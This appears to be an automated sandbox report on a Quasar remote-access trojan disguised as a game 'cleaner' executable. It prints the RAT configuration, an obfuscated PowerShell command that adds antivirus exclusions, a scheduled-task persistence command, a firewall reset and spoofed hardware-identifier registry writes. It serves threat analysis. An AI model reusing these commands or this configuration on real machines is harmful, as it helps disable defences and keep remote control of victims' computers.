Analysis
-
max time kernel
158s -
max time network
158s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
03-01-2025 23:36
Static task
static1
Behavioral task
behavioral1
Sample
applecleaner (1).exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
applecleaner (1).exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral3
Sample
applecleaner (1).exe
Resource
win11-20241007-en
General
-
Target
applecleaner (1).exe
-
Size
6.7MB
-
MD5
cad8354da177706b2d48dd9d0642d9f0
-
SHA1
ea69a1e3cf00894543bb40f5ee4251439e3b2252
-
SHA256
62fc499b88eeb0334509ede6bba0f67dcdce5eb7954e5cbd2adfaabc0e2d405e
-
SHA512
f9dc85730ee4e729358a9acf3d5ace4aa146f16736dd368308c2feb4ee876d0a60b586907aa556ea357459eeb2c678451667ae4bb5dee3e94c2ca39719945f78
-
SSDEEP
196608:3pm+PJQbtnYGscd8rQcDw9Le+3L+cES9SDI:3pm2MnYG96jR+3LM
Malware Config
Extracted
quasar
1.4.1
retigga
192.168.1.90:4782
a44d3f31-890a-4898-b165-c2376c429bdc
-
encryption_key
44D22D01383E73D0D2E9F33669A5C563ECE6903D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral3/files/0x001d00000002aa93-12.dat family_quasar behavioral3/memory/3456-22-0x0000000000620000-0x0000000000944000-memory.dmp family_quasar -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ applecleaner.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3424 netsh.exe -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion applecleaner.exe Set value (data) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion = 33004f00630048005300200020002d002000620000000000 applecleaner.exe -
Deletes itself 1 IoCs
pid Process 4472 applecleaner.exe -
Executes dropped EXE 3 IoCs
pid Process 4472 applecleaner.exe 3456 Client-built.exe 4544 Client.exe -
resource yara_rule behavioral3/files/0x001c00000002aa71-4.dat themida behavioral3/memory/4472-21-0x00007FF6D7AD0000-0x00007FF6D8463000-memory.dmp themida behavioral3/memory/4472-29-0x00007FF6D7AD0000-0x00007FF6D8463000-memory.dmp themida behavioral3/memory/4472-28-0x00007FF6D7AD0000-0x00007FF6D8463000-memory.dmp themida behavioral3/memory/4472-30-0x00007FF6D7AD0000-0x00007FF6D8463000-memory.dmp themida behavioral3/memory/4472-35-0x00007FF6D7AD0000-0x00007FF6D8463000-memory.dmp themida behavioral3/memory/4472-76-0x00007FF6D7AD0000-0x00007FF6D8463000-memory.dmp themida behavioral3/memory/4472-211-0x00007FF6D7AD0000-0x00007FF6D8463000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA applecleaner.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Public\desktop.ini applecleaner.exe -
pid Process 3492 ARP.EXE 2528 cmd.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Checks system information in the registry 2 TTPs 1 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer applecleaner.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4472 applecleaner.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language applecleaner (1).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3476 cmd.exe -
Enumerates system info in registry 2 TTPs 21 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName applecleaner.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral applecleaner.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion applecleaner.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral applecleaner.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "9bfbaba4-3170c998-f" applecleaner.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "a20a3e1d-ee342930-8" applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardVersion applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemBiosVersion applecleaner.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily applecleaner.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 4560 ipconfig.exe 2132 ipconfig.exe 4244 ipconfig.exe -
Kills process with taskkill 3 IoCs
pid Process 2788 taskkill.exe 2888 taskkill.exe 4928 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4500 schtasks.exe 1368 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2036 powershell.exe 2036 powershell.exe 4472 applecleaner.exe 4472 applecleaner.exe 4932 msedge.exe 4932 msedge.exe 4988 msedge.exe 4988 msedge.exe 2900 msedge.exe 2900 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3456 Client-built.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeDebugPrivilege 2888 taskkill.exe Token: SeDebugPrivilege 4544 Client.exe Token: SeDebugPrivilege 4928 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4544 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2216 wrote to memory of 2036 2216 applecleaner (1).exe 77 PID 2216 wrote to memory of 2036 2216 applecleaner (1).exe 77 PID 2216 wrote to memory of 2036 2216 applecleaner (1).exe 77 PID 2216 wrote to memory of 4472 2216 applecleaner (1).exe 79 PID 2216 wrote to memory of 4472 2216 applecleaner (1).exe 79 PID 2216 wrote to memory of 3456 2216 applecleaner (1).exe 81 PID 2216 wrote to memory of 3456 2216 applecleaner (1).exe 81 PID 4472 wrote to memory of 3080 4472 applecleaner.exe 82 PID 4472 wrote to memory of 3080 4472 applecleaner.exe 82 PID 3456 wrote to memory of 4500 3456 Client-built.exe 83 PID 3456 wrote to memory of 4500 3456 Client-built.exe 83 PID 3080 wrote to memory of 2888 3080 cmd.exe 85 PID 3080 wrote to memory of 2888 3080 cmd.exe 85 PID 3456 wrote to memory of 4544 3456 Client-built.exe 86 PID 3456 wrote to memory of 4544 3456 Client-built.exe 86 PID 4472 wrote to memory of 3476 4472 applecleaner.exe 88 PID 4472 wrote to memory of 3476 4472 applecleaner.exe 88 PID 3476 wrote to memory of 4928 3476 cmd.exe 89 PID 3476 wrote to memory of 4928 3476 cmd.exe 89 PID 4544 wrote to memory of 1368 4544 Client.exe 90 PID 4544 wrote to memory of 1368 4544 Client.exe 90 PID 4472 wrote to memory of 876 4472 applecleaner.exe 92 PID 4472 wrote to memory of 876 4472 applecleaner.exe 92 PID 876 wrote to memory of 2788 876 cmd.exe 93 PID 876 wrote to memory of 2788 876 cmd.exe 93 PID 4472 wrote to memory of 1520 4472 applecleaner.exe 94 PID 4472 wrote to memory of 1520 4472 applecleaner.exe 94 PID 1520 wrote to memory of 4988 1520 cmd.exe 95 PID 1520 wrote to memory of 4988 1520 cmd.exe 95 PID 4988 wrote to memory of 4424 4988 msedge.exe 98 PID 4988 wrote to memory of 4424 4988 msedge.exe 98 PID 4472 wrote to memory of 4916 4472 applecleaner.exe 99 PID 4472 wrote to memory of 4916 4472 applecleaner.exe 99 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 PID 4988 wrote to memory of 2520 4988 msedge.exe 100 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe"C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAaABuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAdwBoACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Users\Admin\AppData\Local\Temp\applecleaner.exe"C:\Users\Admin\AppData\Local\Temp\applecleaner.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Deletes itself
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Checks system information in the registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\taskkill.exetaskkill /f /im FortniteClient-Win64-Shipping.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Battle.net.exe >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\taskkill.exetaskkill /f /im Battle.net.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://applecheats.cc3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://applecheats.cc/4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffddfce3cb8,0x7ffddfce3cc8,0x7ffddfce3cd85⤵PID:4424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:25⤵PID:2520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:85⤵PID:2212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:15⤵PID:4572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:15⤵PID:1420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:15⤵PID:4888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3468 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:2900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:15⤵PID:1868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,11945822042144230693,14828915763184287613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:15⤵PID:3024
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:4916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:3664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NETSH WINSOCK RESET >nul 2>&13⤵PID:1792
-
C:\Windows\system32\netsh.exeNETSH WINSOCK RESET4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NETSH INT IP RESET >nul 2>&13⤵PID:864
-
C:\Windows\system32\netsh.exeNETSH INT IP RESET4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NETSH INTERFACE IPV4 RESET >nul 2>&13⤵PID:1368
-
C:\Windows\system32\netsh.exeNETSH INTERFACE IPV4 RESET4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NETSH INTERFACE IPV6 RESET >nul 2>&13⤵PID:4584
-
C:\Windows\system32\netsh.exeNETSH INTERFACE IPV6 RESET4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NETSH INTERFACE TCP RESET >nul 2>&13⤵PID:2312
-
C:\Windows\system32\netsh.exeNETSH INTERFACE TCP RESET4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NETSH INT RESET ALL >nul 2>&13⤵PID:2524
-
C:\Windows\system32\netsh.exeNETSH INT RESET ALL4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall reset >nul 2>&13⤵PID:5076
-
C:\Windows\system32\netsh.exenetsh advfirewall reset4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh winhttp reset proxy >nul 2>&13⤵PID:2496
-
C:\Windows\system32\netsh.exenetsh winhttp reset proxy4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c IPCONFIG /FLUSHDNS >nul 2>&13⤵PID:4604
-
C:\Windows\system32\ipconfig.exeIPCONFIG /FLUSHDNS4⤵
- Gathers network information
PID:4560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c IPCONFIG /RELEASE >nul 2>&13⤵PID:4044
-
C:\Windows\system32\ipconfig.exeIPCONFIG /RELEASE4⤵
- Gathers network information
PID:2132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c IPCONFIG /RENEW >nul 2>&13⤵PID:3024
-
C:\Windows\system32\ipconfig.exeIPCONFIG /RENEW4⤵
- Gathers network information
PID:4244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NBTSTAT -R >nul 2>&13⤵PID:3436
-
C:\Windows\system32\nbtstat.exeNBTSTAT -R4⤵PID:816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NBTSTAT -RR >nul 2>&13⤵PID:860
-
C:\Windows\system32\nbtstat.exeNBTSTAT -RR4⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c arp -a >nul 2>&13⤵
- Network Service Discovery
PID:2528 -
C:\Windows\system32\ARP.EXEarp -a4⤵
- Network Service Discovery
PID:3492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c arp -d >nul 2>&13⤵PID:3584
-
C:\Windows\system32\ARP.EXEarp -d4⤵PID:4176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c route -f >nul 2>&13⤵PID:4820
-
C:\Windows\system32\ROUTE.EXEroute -f4⤵PID:3080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4500
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1368
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1368
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:916
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
